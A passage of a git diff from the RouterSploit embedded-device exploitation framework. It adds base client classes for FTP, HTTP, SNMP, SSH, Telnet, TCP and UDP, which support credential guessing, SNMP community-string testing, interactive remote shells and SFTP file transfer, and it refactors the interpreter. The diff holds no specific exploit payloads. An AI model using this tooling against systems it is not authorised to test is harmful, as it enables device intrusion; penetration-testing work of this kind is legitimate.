+class FTPClient(Exploit): + """ FTP Client exploit """ + + target_protocol = Protocol.FTP + + ssl = OptBool("false", "SSL enabled: true/false") + verbosity = OptBool("true", "Enable verbose output: true/false") + + def ftp_create(self): + if self.ssl: + ftp_client = ftplib.FTP_TLS() + else: + ftp_client = ftplib.FTP() + + return ftp_client + + def ftp_connect(self, retries=1): + ftp_client = self.ftp_create() + + for _ in range(retries): + try: + ftp_client.connect(self.target, self.port, timeout=FTP_TIMEOUT) + except (socket.error, socket.timeout): + print_error("Connection error") + except Exception as err: + print_error(err) + else: + return ftp_client + + ftp_client.close() + return None + + def ftp_login(self, username, password): + ftp_client = self.ftp_connect() + if ftp_client: + try: + ftp_client.login(username, password) + return ftp_client + except Exception as err: + pass + + ftp_client.close() + + return None + + def ftp_test_connect(self): + ftp_client = self.ftp_connect() + if ftp_client: + ftp_client.close() + return True + + return False diff --git a/routersploit/core/http/__init__.py b/routersploit/core/http/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/core/http/http_client.py b/routersploit/core/http/http_client.py new file mode 100644 index 000000000..5daebab0d --- /dev/null +++ b/routersploit/core/http/http_client.py @@ -0,0 +1,67 @@ +import socket +import requests + +from routersploit.core.exploit.exploit import Exploit +from routersploit.core.exploit.exploit import Protocol +from routersploit.core.exploit.option import OptBool +from routersploit.core.exploit.printer import print_error + + +HTTP_TIMEOUT = 30.0 + + +class HTTPClient(Exploit): + """ HTTP Client exploit """ + + target_protocol = Protocol.HTTP + + verbosity = OptBool("true", "Verbosity enabled: true/false") + ssl = OptBool("false", "SSL enabled: true/false") + + def http_request(self, method, path, session=requests, **kwargs): + if self.ssl: + url = "https://" + else: + url = "http://" + + url += "{}:{}{}".format(self.target, self.port, path) + + kwargs.setdefault("timeout", HTTP_TIMEOUT) + kwargs.setdefault("verify", False) + kwargs.setdefault("allow_redirects", False) + + try: + return getattr(session, method.lower())(url, **kwargs) + except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): + print_error("Invalid URL format: {}".format(url), verbose=self.verbosity) + except requests.exceptions.ConnectionError: + print_error("Connection error: {}".format(url), verbose=self.verbosity) + except requests.RequestException as error: + print_error(error, verbose=self.verbosity) + except socket.error as err: + print_error(err, verbose=self.verbosity) + except KeyboardInterrupt: + print_error("Module has been stopped", verbose=self.verbosity) + + return None + + def get_target_url(self, path=""): + if self.ssl: + url = "https://" + else: + url = "http://" + + url += "{}:{}{}".format(self.target, self.port, path) + + return url + + def http_test_connect(self): + response = self.http_request( + method="GET", + path="/" + ) + + if response: + return True + + return False diff --git a/routersploit/core/snmp/__init__.py b/routersploit/core/snmp/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/core/snmp/snmp_client.py b/routersploit/core/snmp/snmp_client.py new file mode 100644 index 000000000..3a14dbea6 --- /dev/null +++ b/routersploit/core/snmp/snmp_client.py @@ -0,0 +1,35 @@ +from pysnmp.entity.rfc3413.oneliner import cmdgen + +from routersploit.core.exploit.exploit import Exploit +from routersploit.core.exploit.exploit import Protocol +from routersploit.core.exploit.option import OptBool +from routersploit.core.exploit.printer import print_success +from routersploit.core.exploit.printer import print_error + + +class SNMPClient(Exploit): + """ SNMP Client exploit """ + + target_protocol = Protocol.SNMP + + verbosity = OptBool("true", "Enable verbose output: true/false") + + def snmp_get(self, community_string, oid, version=1): + cmdGen = cmdgen.CommandGenerator() + + try: + errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( + cmdgen.CommunityData(community_string, mpModel=version), + cmdgen.UdpTransportTarget((self.target, self.port)), + oid, + ) + except Exception: + return None + + if errorIndication or errorStatus: + print_error("SNMP invalid community string: '{}'".format(community_string), verbose=self.verbosity) + else: + print_success("SNMP valid community string found: '{}'".format(community_string), verbose=self.verbosity) + return varBinds + + return None diff --git a/routersploit/core/ssh/__init__.py b/routersploit/core/ssh/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/core/ssh/ssh_client.py b/routersploit/core/ssh/ssh_client.py new file mode 100644 index 000000000..e3b9200a5 --- /dev/null +++ b/routersploit/core/ssh/ssh_client.py @@ -0,0 +1,182 @@ +import socket +import paramiko +import os +import select +import sys +import threading +import io + +from routersploit.core.exploit.exploit import Exploit +from routersploit.core.exploit.exploit import Protocol +from routersploit.core.exploit.option import OptBool +from routersploit.core.exploit.printer import print_success +from routersploit.core.exploit.printer import print_error +from routersploit.core.exploit.utils import random_text + + +SSH_TIMEOUT = 30.0 + + +class SSHClient(Exploit): + """ SSH Client exploit """ + + target_protocol = Protocol.SSH + + verbosity = OptBool("true", "Enable verbose output: true/false") + + def ssh_create(self): + ssh_client = paramiko.SSHClient() + ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + + return ssh_client + + def ssh_login(self, username, password, retries=1): + ssh_client = self.ssh_create() + + for _ in range(retries): + try: + ssh_client.connect(self.target, self.port, timeout=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, password=password, look_for_keys=False) + except paramiko.AuthenticationException: + print_error("SSH Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + ssh_client.close() + break + except Exception as err: + print_error("Err: {}".format(err), verbose=self.verbosity) + else: + print_success("SSH Authentication Successful - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + return ssh_client + + ssh_client.close() + + return + + def ssh_login_pkey(self, username, priv_key, retries=1): + ssh_client = self.ssh_create() + + if "DSA PRIVATE KEY" in priv_key: + priv_key = paramiko.DSSKey.from_private_key(io.StringIO(priv_key)) + elif "RSA PRIVATE KEY" in priv_key: + priv_key = paramiko.RSAKey.from_private_key(io.StringIO(priv_key)) + else: + return None + + for _ in range(retries): + try: + ssh_client.connect(self.target, self.port, timouet=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, pkey=priv_key) + except paramiko.AuthenticationException: + print_error("Authentication Failed - Username: '{}' auth with private key".format(username), verbose=self.verbosity) + except Exception as err: + print_error("Err: {}".format(err), verbose=self.verbosity) + + ssh_client.close() + + return None + + def ssh_test_connect(self): + ssh_client = self.ssh_create() + + try: + ssh_client.connect(self.target, self.port, timeout=SSH_TIMEOUT, username="root", password=random_text(12)) + except paramiko.AuthenticationException: + ssh_client.close() + return True + + except socket.error: + print_error("Connection error") + ssh_client.close() + return False + + except Exception as err: + print_error("Err: {}".format(err)) + + ssh_client.close() + return False + + def ssh_execute(self, ssh, cmd): + ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd) + return ssh_stdout.read() + + def ssh_get_file(self, ssh, remote_file, local_file): + sftp = ssh.open_sftp() + sftp.get(remote_file, local_file) + + def ssh_get_content(self, ssh, remote_file): + fp_content = io.BytesIO() + sftp = ssh.open_sftp() + sftp.getfo(remote_file, fp_content) + + return fp_content.getvalue() + + def ssh_send_file(self, ssh, local_file, dest_file): + sftp = ssh.open_sftp() + sftp.put(local_file, dest_file) + + def ssh_send_content(self, ssh, content, dest_file): + fp_content = io.BytesIO(content) + sftp = ssh.open_sftp() + sftp.putfo(fp_content, dest_file) + + def ssh_interactive(self, ssh): + chan = ssh.invoke_shell() + if os.name == "posix": + self._postix_shell(chan) + else: + self._windows_shell(chan) + + def _posix_shell(self, chan): + import termios + import tty + + oldtty = termios.tcgetattr(sys.stdin) + try: + tty.setraw(sys.stdin.fileno()) + tty.setcbreak(sys.stdin.fileno()) + chan.settimeout(0.0) + + while True: + r, w, e = select.select([chan, sys.stdin], [], []) + if chan in r: + try: + x = unicode(chan.recv(1024)) + if len(x) == 0: + break + + sys.stdout.write(x) + sys.stdout.flush() + except socket.timeout: + pass + + if sys.stdin in r: + x = sys.stdin.read(1) + if len(x) == 0: + break + chan.send(x) + + finally: + termios.tcsetattr(sys.stdin,termios.TCSADRAIN, oldtty) + return + + def _windows_shell(self, chan): + def writeall(sock): + while True: + data = sock.recv(256) + if not data: + sys.stdout.flush() + return + + sys.stdout.write(data) + sys.stdout.flush() + + writer = threading.Thread(target=writeall, args=(chan,)) + writer.start() + + try: + while True: + d = sys.stdin.read(1) + if not d: + break + + chan.send(d) + + except Exception as err: + print_error("Err: {}".format(err)) diff --git a/routersploit/core/tcp/__init__.py b/routersploit/core/tcp/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/core/tcp/tcp_client.py b/routersploit/core/tcp/tcp_client.py new file mode 100644 index 000000000..c9bb7d59b --- /dev/null +++ b/routersploit/core/tcp/tcp_client.py @@ -0,0 +1,67 @@ +import socket + +from routersploit.core.exploit.exploit import Exploit +from routersploit.core.exploit.exploit import Protocol +from routersploit.core.exploit.printer import print_status +from routersploit.core.exploit.printer import print_error +from routersploit.core.exploit.utils import is_ipv4 +from routersploit.core.exploit.utils import is_ipv6 + + +TCP_SOCKET_TIMEOUT = 8.0 + + +class TCPClient(Exploit): + """ TCP Client exploit """ + + target_protocol = Protocol.TCP + + def tcp_create(self): + if is_ipv4(self.target): + tcp_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + elif is_ipv6(self.target): + tcp_client = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + else: + print_error("Target address is not valid IPv4 nor IPv6 address") + return None + + tcp_client.settimeout(TCP_SOCKET_TIMEOUT) + return tcp_client + + def tcp_connect(self): + try: + tcp_client = self.tcp_create() + tcp_client.connect((self.target, self.port)) + + print_status("Connection established") + return tcp_client + + except Exception: + print_error("Could not connect") + + return None + + def tcp_send(self, tcp_client, data): + if tcp_client: + if type(data) is bytes: + return tcp_client.send(data) + elif type(data) is str: + return tcp_client.send(bytes(data, "utf-8")) + else: + print_error("Data to send is not type of bytes or string") + + return None + + def tcp_recv(self, tcp_client, num): + if tcp_client: + try: + response = tcp_client.recv(num) + return str(response, "utf-8") + except socket.timeout: + print_error("Socket did timeout") + + return None + + def tcp_close(self, tcp_client): + if tcp_client: + tcp_client.close() diff --git a/routersploit/core/telnet/__init__.py b/routersploit/core/telnet/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/core/telnet/telnet_client.py b/routersploit/core/telnet/telnet_client.py new file mode 100644 index 000000000..388d69795 --- /dev/null +++ b/routersploit/core/telnet/telnet_client.py @@ -0,0 +1,95 @@ +import telnetlib + +from routersploit.core.exploit.exploit import Exploit +from routersploit.core.exploit.exploit import Protocol +from routersploit.core.exploit.option import OptBool +from routersploit.core.exploit.printer import print_success +from routersploit.core.exploit.printer import print_error + + +TELNET_TIMEOUT = 30.0 + + +class TelnetClient(Exploit): + """ Telnet Client exploit """ + + target_protocol = Protocol.TELNET + + verbosity = OptBool("true", "Enable verbose output: true/false") + + def telnet_connect(self, target=None, port=None): + if not target: + target = self.target + if not port: + port = self.port + + try: + telnet_client = telnetlib.Telnet(target, port, timeout=TELNET_TIMEOUT) + return telnet_client + except Exception: + pass + + return None + + def telnet_login(self, username, password, target=None, port=None, retries=1): + if not target: + target = self.target + if not port: + port = self.port + + for _ in range(retries): + try: + telnet_client = self.telnet_connect(target=target, port=port) + telnet_client.expect([b"Login: ", b"login: ", b"Username: ", b"username: "], 5) + telnet_client.write(bytes(username, "utf-8") + b"\r\n") + telnet_client.expect([b"Password: ", b"password: "], 5) + telnet_client.write(bytes(password, "utf-8") + b"\r\n") + telnet_client.write(b"\r\n") + + (i, obj, res) = telnet_client.expect([b"Incorrect", b"incorrect"], 5) + + if i == -1 and any([x in res for x in [b"#", b"$", b">"]]) or len(res) > 500: # big banner e.g. mikrotik + print_success("Telnet Authentication Successful - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + return telnet_client + else: + print_error("Telnet Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + break + except EOFError: + print_error("Telnet connection error") + except Exception as err: + print_error(err) + + return None + + def telnet_test_connect(self): + try: + telnet_client = telnetlib.Telnet(self.target, self.port, timeout=TELNET_TIMEOUT) + telnet_client.expect([b"Login: ", b"login: ", b"Username: ", b"username: "], 5) + telnet_client.close() + + return True + except Exception: + pass + + return False + + def telnet_interactive(self, telnet): + telnet.interact() + + def telnet_read_until(self, telnet_client, data): + if telnet_client: + if type(data) is str: + data = bytes(data, "utf-8") + + return telnet_client.read_until(data, 5) + + return None + + def telnet_write(self, telnet_client, data): + if telnet_client: + if type(data) is str: + data = bytes(data, "utf-8") + + return telnet_client.write(data, 5) + + return None diff --git a/routersploit/core/udp/__init__.py b/routersploit/core/udp/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/core/udp/udp_client.py b/routersploit/core/udp/udp_client.py new file mode 100644 index 000000000..64796327c --- /dev/null +++ b/routersploit/core/udp/udp_client.py @@ -0,0 +1,53 @@ +import socket + +from routersploit.core.exploit.exploit import Exploit +from routersploit.core.exploit.exploit import Protocol +from routersploit.core.exploit.printer import print_error +from routersploit.core.exploit.utils import is_ipv4 +from routersploit.core.exploit.utils import is_ipv6 + + +UDP_SOCKET_TIMEOUT = 8.0 + + +class UDPClient(Exploit): + """ UDP Client exploit """ + + target_protocol = Protocol.UDP + + def udp_create(self): + if is_ipv4(self.target): + udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + elif is_ipv6(self.target): + udp_client = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + else: + print_error("Target address is not valid IPv4 nor IPv6 address") + return None + + udp_client.settimeout(UDP_SOCKET_TIMEOUT) + return udp_client + + def udp_send(self, udp_client, data): + if udp_client: + if type(data) is bytes: + return udp_client.sendto(data, (self.target, self.port)) + elif type(data) is str: + return udp_client.sendto(bytes(data, "utf-8"), (self.target, self.port)) + else: + print_error("Data to send is not type of bytes or string") + + return None + + def udp_recv(self, udp_client, num): + if udp_client: + try: + response = udp_client.recv(num) + return str(response, "utf-8") + except socket.timeout: + print_error("Socket did timeout") + + return None + + def udp_close(self, udp_client): + if udp_client: + udp_client.close() diff --git a/routersploit/exploits.py b/routersploit/exploits.py deleted file mode 100644 index 6333a3f26..000000000 --- a/routersploit/exploits.py +++ /dev/null @@ -1,145 +0,0 @@ -import os -import threading -import time -from itertools import chain -from weakref import WeakKeyDictionary - -from routersploit.exceptions import OptionValidationError -from routersploit.utils import print_status, NonStringIterable - -GLOBAL_OPTS = {} - - -class Option(object): - """ Exploit attribute that is set by the end user. """ - - def __init__(self, default, description="", validators=()): - self.label = None - if isinstance(validators, NonStringIterable): - self.validators = validators - else: - self.validators = (validators,) - - self.default = default - self.description = description - self.data = WeakKeyDictionary() - - def __get__(self, instance, owner): - try: - return self.data[instance] - except KeyError: - pass - - try: - return self._apply_widgets(GLOBAL_OPTS[self.label]) - except KeyError: - return self.default - - def __set__(self, instance, value): - self.data[instance] = self._apply_widgets(value) - - def _apply_widgets(self, value): - for validator in self.validators: - value = validator(value) - return value - - -class ExploitOptionsAggregator(type): - """ Metaclass for exploit base class. - - Metaclass is aggregating all possible Attributes that user can set - for tab completion purposes. - """ - def __new__(cls, name, bases, attrs): - try: - base_exploit_attributes = chain( - map(lambda x: x.exploit_attributes, bases) - ) - except AttributeError: - attrs['exploit_attributes'] = {} - else: - attrs['exploit_attributes'] = { - k: v for d in base_exploit_attributes for k, v in d.iteritems() - } - - for key, value in attrs.iteritems(): - if isinstance(value, Option): - value.label = key - attrs['exploit_attributes'].update({key: value.description}) - elif key == "__info__": - attrs["_{}{}".format(name, key)] = value - del attrs[key] - # Removing exploit_attribute that was overwritten - # in the child and is not a Option() instance. - elif key in attrs['exploit_attributes']: - del attrs['exploit_attributes'][key] - return super(ExploitOptionsAggregator, cls).__new__( - cls, name, bases, attrs - ) - - -class BaseExploit(object): - __metaclass__ = ExploitOptionsAggregator - - @property - def options(self): - """ Returns list of options that user can set. - - Returns list of options aggregated by - ExploitOptionsAggregator metaclass that user can set. - - :return: list of options that user can set - """ - return self.exploit_attributes.keys() - - def __str__(self): - return self.__module__.split('.', 2).pop().replace('.', os.sep) - - -class Exploit(BaseExploit): - """ Base class for exploits. """ - - target = Option(default="", description="Target IP address.") - # port = Option(default="", description="Target port.") - - def run(self): - raise NotImplementedError("You have to define your own 'run' method.") - - def check(self): - raise NotImplementedError( - "You have to define your own 'check' method." - ) - - def run_threads(self, threads, target, *args, **kwargs): - workers = [] - threads_running = threading.Event() - threads_running.set() - for worker_id in range(int(threads)): - worker = threading.Thread( - target=target, - args=chain((threads_running,), args), - kwargs=kwargs, - name='worker-{}'.format(worker_id), - ) - workers.append(worker) - worker.start() - - start = time.time() - try: - while worker.isAlive(): - worker.join(1) - except KeyboardInterrupt: - threads_running.clear() - - for worker in workers: - worker.join() - print_status('Elapsed time: ', time.time() - start, 'seconds') - - def validate_setup(self): - """ Validate exploit's setup before `run()` - - If exploit need extra validation make sure to overwrite this with - custom validation logic. - """ - if not self.target: - raise OptionValidationError("Please set target address.") diff --git a/routersploit/interpreter.py b/routersploit/interpreter.py index 8cce780a3..3997bd6f2 100644 --- a/routersploit/interpreter.py +++ b/routersploit/interpreter.py @@ -1,3 +1,5 @@ +from __future__ import print_function + import atexit import itertools import os @@ -5,14 +7,30 @@ import traceback from collections import Counter -from routersploit import utils -from routersploit.exceptions import ( - RoutersploitException, - OptionValidationError, +from future.builtins import input + +from routersploit.core.exploit.exceptions import RoutersploitException +from routersploit.core.exploit.utils import ( + index_modules, + pythonize_path, + humanize_path, + import_exploit, + stop_after, + module_required, + MODULES_DIR, + WORDLISTS_DIR, +) +from routersploit.core.exploit.printer import ( + print_info, + print_success, + print_error, + print_status, + print_table, + pprint_dict_in_order, + PrinterThread, + printer_queue ) -from routersploit.exploits import Exploit, GLOBAL_OPTS -from routersploit.payloads import BasePayload -from routersploit.printer import PrinterThread, printer_queue +from routersploit.core.exploit.exploit import GLOBAL_OPTS import readline @@ -39,7 +57,7 @@ def setup(self): :return: """ if not os.path.exists(self.history_file): - with open(self.history_file, 'a+') as history: + with open(self.history_file, "a+") as history: if is_libedit(): history.write("_HiStOrY_V2_\n\n") @@ -47,10 +65,10 @@ def setup(self): readline.set_history_length(self.history_length) atexit.register(readline.write_history_file, self.history_file) - readline.parse_and_bind('set enable-keypad on') - + readline.parse_and_bind("set enable-keypad on") + readline.set_completer(self.complete) - readline.set_completer_delims(' \t\n;') + readline.set_completer_delims(" \t\n;") if is_libedit(): readline.parse_and_bind("bind ^I rl_complete") else: @@ -86,23 +104,23 @@ def get_command_handler(self, command): def start(self): """ Routersploit main entry point. Starting interpreter loop. """ - utils.print_info(self.banner) + print_info(self.banner) printer_queue.join() while True: try: - command, args = self.parse_line(raw_input(self.prompt)) + command, args = self.parse_line(input(self.prompt)) if not command: continue command_handler = self.get_command_handler(command) command_handler(args) except RoutersploitException as err: - utils.print_error(err) + print_error(err) except EOFError: - utils.print_info() - utils.print_status("routersploit stopped") + print_info() + print_status("routersploit stopped") break except KeyboardInterrupt: - utils.print_info() + print_info() finally: printer_queue.join() @@ -121,19 +139,17 @@ def complete(self, text, state): if start_index > 0: cmd, args = self.parse_line(line) - if cmd == '': + if cmd == "": complete_function = self.default_completer else: try: - complete_function = getattr(self, 'complete_' + cmd) + complete_function = getattr(self, "complete_" + cmd) except AttributeError: complete_function = self.default_completer else: complete_function = self.raw_command_completer - self.completion_matches = complete_function( - text, line, start_index, end_index - ) + self.completion_matches = complete_function(text, line, start_index, end_index) try: return self.completion_matches[state] @@ -146,17 +162,11 @@ def commands(self, *ignored): :param ignored: :return: full list of interpreter commands """ - return [ - command.rsplit("_").pop() for command in dir(self) - if command.startswith("command_") - ] + return [command.rsplit("_").pop() for command in dir(self) if command.startswith("command_")] def raw_command_completer(self, text, line, start_index, end_index): """ Complete command w/o any argument """ - return [ - command for command in self.suggested_commands() - if command.startswith(text) - ] + return [command for command in self.suggested_commands() if command.startswith(text)] def default_completer(self, *ignored): return [] @@ -196,26 +206,18 @@ def __init__(self): self.current_module = None self.raw_prompt_template = None self.module_prompt_template = None - self.prompt_hostname = 'rsf' - self.show_sub_commands = ( - 'info', 'options', 'devices', 'all', - 'creds', 'exploits', 'scanners' - ) + self.prompt_hostname = "rsf" + self.show_sub_commands = ("info", "options", "devices", "all", "creds", "exploits", "scanners", "wordlists") - self.global_commands = sorted( - ['use ', 'exec ', 'help', 'exit', 'show ', 'search '] - ) - self.module_commands = self._extend_with_global_commands( - ['run', 'back', 'set ', 'setg ', 'check'] - ) - self.payload_commands = self._extend_with_global_commands( - ['run', 'back', 'set ', 'setg '] - ) + self.global_commands = sorted(["use ", "exec ", "help", "exit", "show ", "search "]) + self.module_commands = ["run", "back", "set ", "setg ", "check"] + self.module_commands.extend(self.global_commands) + self.module_commands.sort() - self.modules = utils.index_modules() + self.modules = index_modules() self.modules_count = Counter() - [self.modules_count.update(module.split('.')) for module in self.modules] - self.main_modules_dirs = [module for module in os.listdir(utils.MODULES_DIR) if not module.startswith("__")] + self.modules_count.update([module.split('.')[0] for module in self.modules]) + self.main_modules_dirs = [module for module in os.listdir(MODULES_DIR) if not module.startswith("__")] self.__parse_prompt() @@ -226,17 +228,22 @@ def __init__(self): | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ \_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__| | | - IoT Exploitation Framework |_| + Exploitation Framework for |_| by Threat9 + Embedded Devices - Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz) - Codename : Bad Blood - Version : 2.2.1 + Codename : I Knew You Were Trouble + Version : 3.0.0 + Homepage : https://www.threat9.com - @threatnine + Join Slack : https://www.threat9.com/slack - Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Payloads: {payloads_count} -""".format(exploits_count=self.modules_count['exploits'], - scanners_count=self.modules_count['scanners'], - creds_count=self.modules_count['creds'], - payloads_count=self.modules_count['payloads']) + Join Threat9 Beta Program - https://www.threat9.com + + Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} +""".format(exploits_count=self.modules_count["exploits"], + scanners_count=self.modules_count["scanners"], + creds_count=self.modules_count["creds"], + generic_count=self.modules_count["generic"], + payloads_count=self.modules_count["payloads"]) def __parse_prompt(self): raw_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 > " @@ -247,12 +254,6 @@ def __parse_prompt(self): module_prompt_template = os.getenv("RSF_MODULE_PROMPT", module_prompt_default_template).replace('\\033', '\033') self.module_prompt_template = module_prompt_template if all(map(lambda x: x in module_prompt_template, ['{host}', "{module}"])) else module_prompt_default_template - def _extend_with_global_commands(self, sequence): - """ Extend specific command suggestion with global commands """ - sequence.extend(self.global_commands) - sequence.sort() - return sequence - @property def module_metadata(self): return getattr(self.current_module, "_{}__info__".format(self.current_module.__class__.__name__)) @@ -281,7 +282,7 @@ def available_modules_completion(self, text): :param text: argument of 'use' command :return: list of tab completion hints """ - text = utils.pythonize_path(text) + text = pythonize_path(text) all_possible_matches = filter(lambda x: x.startswith(text), self.modules) matches = set() for match in all_possible_matches: @@ -289,7 +290,7 @@ def available_modules_completion(self, text): if not tail: sep = "" matches.add("".join((text, head, sep))) - return list(map(utils.humanize_path, matches)) # humanize output, replace dots to forward slashes + return list(map(humanize_path, matches)) # humanize output, replace dots to forward slashes def suggested_commands(self): """ Entry point for intelligent tab completion. @@ -299,12 +300,7 @@ def suggested_commands(self): :return: list of most accurate command suggestions """ if self.current_module and GLOBAL_OPTS: - return sorted(itertools.chain(self.module_commands, ('unsetg ',))) - elif self.current_module and isinstance(self.current_module, Exploit): - return self.module_commands - elif self.current_module and isinstance(self.current_module, - BasePayload): - return self.payload_commands + return sorted(itertools.chain(self.module_commands, ("unsetg ",))) elif self.current_module: return self.module_commands else: @@ -314,85 +310,84 @@ def command_back(self, *args, **kwargs): self.current_module = None def command_use(self, module_path, *args, **kwargs): - module_path = utils.pythonize_path(module_path) - module_path = '.'.join(('routersploit', 'modules', module_path)) + module_path = pythonize_path(module_path) + module_path = ".".join(("routersploit", "modules", module_path)) # module_path, _, exploit_name = module_path.rpartition('.') try: - self.current_module = utils.import_exploit(module_path)() + self.current_module = import_exploit(module_path)() except RoutersploitException as err: - utils.print_error(err.message) + print_error(str(err)) - @utils.stop_after(2) + @stop_after(2) def complete_use(self, text, *args, **kwargs): if text: return self.available_modules_completion(text) else: return self.main_modules_dirs - @utils.module_required + @module_required def command_run(self, *args, **kwargs): + print_status("Running module...") try: - self.current_module.validate_setup() - utils.print_status("Running module...") self.current_module.run() except KeyboardInterrupt: - utils.print_info() - utils.print_error("Operation cancelled by user") - except OptionValidationError as err: - utils.print_error(err) - except Exception: - utils.print_error(traceback.format_exc(sys.exc_info())) + print_info() + print_error("Operation cancelled by user") + except: + print_error(traceback.format_exc(sys.exc_info())) def command_exploit(self, *args, **kwargs): self.command_run() - @utils.module_required + @module_required def command_set(self, *args, **kwargs): - key, _, value = args[0].partition(' ') + key, _, value = args[0].partition(" ") if key in self.current_module.options: setattr(self.current_module, key, value) + self.current_module.exploit_attributes[key][0] = value + if kwargs.get("glob", False): GLOBAL_OPTS[key] = value - utils.print_success({key: value}) + print_success("{} => {}".format(key, value)) else: - utils.print_error("You can't set option '{}'.\n" - "Available options: {}".format(key, self.current_module.options)) + print_error("You can't set option '{}'.\n" + "Available options: {}".format(key, self.current_module.options)) - @utils.stop_after(2) + @stop_after(2) def complete_set(self, text, *args, **kwargs): if text: - return [' '.join((attr, "")) for attr in self.current_module.options if attr.startswith(text)] + return [" ".join((attr, "")) for attr in self.current_module.options if attr.startswith(text)] else: return self.current_module.options - @utils.module_required + @module_required def command_setg(self, *args, **kwargs): kwargs['glob'] = True self.command_set(*args, **kwargs) - @utils.stop_after(2) + @stop_after(2) def complete_setg(self, text, *args, **kwargs): return self.complete_set(text, *args, **kwargs) - @utils.module_required + @module_required def command_unsetg(self, *args, **kwargs): key, _, value = args[0].partition(' ') try: del GLOBAL_OPTS[key] except KeyError: - utils.print_error("You can't unset global option '{}'.\n" - "Available global options: {}".format(key, GLOBAL_OPTS.keys())) + print_error("You can't unset global option '{}'.\n" + "Available global options: {}".format(key, list(GLOBAL_OPTS.keys()))) else: - utils.print_success({key: value}) + print_success({key: value}) - @utils.stop_after(2) + @stop_after(2) def complete_unsetg(self, text, *args, **kwargs): if text: return [' '.join((attr, "")) for attr in GLOBAL_OPTS.keys() if attr.startswith(text)] else: - return GLOBAL_OPTS.keys() + return list(GLOBAL_OPTS.keys()) - @utils.module_required + @module_required def get_opts(self, *args): """ Generator returning module's Option attributes (option_name, option_value, option_description) @@ -401,56 +396,64 @@ def get_opts(self, *args): """ for opt_key in args: try: - opt_description = self.current_module.exploit_attributes[opt_key] - opt_value = getattr(self.current_module, opt_key) + opt_description = self.current_module.exploit_attributes[opt_key][1] + opt_display_value = self.current_module.exploit_attributes[opt_key][0] except (KeyError, AttributeError): pass else: - yield opt_key, opt_value, opt_description + yield opt_key, opt_display_value, opt_description - @utils.module_required + @module_required def _show_info(self, *args, **kwargs): - utils.pprint_dict_in_order( + pprint_dict_in_order( self.module_metadata, ("name", "description", "devices", "authors", "references"), ) - utils.print_info() + print_info() - @utils.module_required + @module_required def _show_options(self, *args, **kwargs): - target_opts = ['target', 'port', 'rhost', 'rport', 'lhost', 'lport'] + target_names = ["target", "port", "ssl", "rhost", "rport", "lhost", "lport"] + target_opts = [opt for opt in self.current_module.options if opt in target_names] module_opts = [opt for opt in self.current_module.options if opt not in target_opts] headers = ("Name", "Current settings", "Description") - utils.print_info('\nTarget options:') - utils.print_table(headers, *self.get_opts(*target_opts)) + print_info("\nTarget options:") + print_table(headers, *self.get_opts(*target_opts)) if module_opts: - utils.print_info('\nModule options:') - utils.print_table(headers, *self.get_opts(*module_opts)) + print_info("\nModule options:") + print_table(headers, *self.get_opts(*module_opts)) - utils.print_info() + print_info() - @utils.module_required + @module_required def _show_devices(self, *args, **kwargs): # TODO: cover with tests try: devices = self.current_module._Exploit__info__['devices'] - utils.print_info("\nTarget devices:") + print_info("\nTarget devices:") i = 0 for device in devices: if isinstance(device, dict): - utils.print_info(" {} - {}".format(i, device['name'])) + print_info(" {} - {}".format(i, device['name'])) else: - utils.print_info(" {} - {}".format(i, device)) + print_info(" {} - {}".format(i, device)) i += 1 - utils.print_info() + print_info() except KeyError: - utils.print_info("\nTarget devices are not defined") + print_info("\nTarget devices are not defined") + + @module_required + def _show_wordlists(self, *args, **kwargs): + headers = ("Wordlist", "Path") + wordlists = [(f, "file://{}/{}".format(WORDLISTS_DIR, f)) for f in os.listdir(WORDLISTS_DIR) if f.endswith(".txt")] + + print_table(headers, *wordlists, max_column_length=100) def __show_modules(self, root=''): for module in [module for module in self.modules if module.startswith(root)]: - utils.print_info(module.replace('.', os.sep)) + print_info(module.replace('.', os.sep)) def _show_all(self, *args, **kwargs): self.__show_modules() @@ -469,36 +472,35 @@ def command_show(self, *args, **kwargs): try: getattr(self, "_show_{}".format(sub_command))(*args, **kwargs) except AttributeError: - utils.print_error("Unknown 'show' sub-command '{}'. " - "What do you want to show?\n" - "Possible choices are: {}".format(sub_command, self.show_sub_commands)) + print_error("Unknown 'show' sub-command '{}'. " + "What do you want to show?\n" + "Possible choices are: {}".format(sub_command, self.show_sub_commands)) - @utils.stop_after(2) + @stop_after(2) def complete_show(self, text, *args, **kwargs): if text: return [command for command in self.show_sub_commands if command.startswith(text)] else: return self.show_sub_commands - @utils.module_required + @module_required def command_check(self, *args, **kwargs): try: - self.current_module.validate_setup() result = self.current_module.check() except Exception as error: - utils.print_error(error) + print_error(error) else: if result is True: - utils.print_success("Target is vulnerable") + print_success("Target is vulnerable") elif result is False: - utils.print_error("Target is not vulnerable") + print_error("Target is not vulnerable") else: - utils.print_status("Target could not be verified") + print_status("Target could not be verified") def command_help(self, *args, **kwargs): - utils.print_info(self.global_help) + print_info(self.global_help) if self.current_module: - utils.print_info("\n", 